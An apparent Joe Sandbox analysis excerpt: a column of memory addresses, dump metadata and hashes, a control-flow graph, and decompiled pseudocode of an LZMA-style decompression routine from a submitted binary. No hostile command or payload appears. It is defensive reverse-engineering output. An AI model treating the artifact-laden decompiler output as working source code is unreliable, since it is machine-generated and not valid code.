                                                                                              0x00000000
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x0040749d
                                                                                              0x00407458
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x0040749d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725b
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074c7
                                                                                              0x00407490

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                              • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                              • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 767 4074f0-407505 763->767 768 407507-40751a 763->768 764->759 769 4075e5-4075f8 765->769 771 406bf2 766->771 772 4075fa 766->772 773 40751d-407524 767->773 768->773 774 4075fd-407601 769->774 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->769 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->769 791 406cc4-406cc8 785->791 786->769 787->779 788->769 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
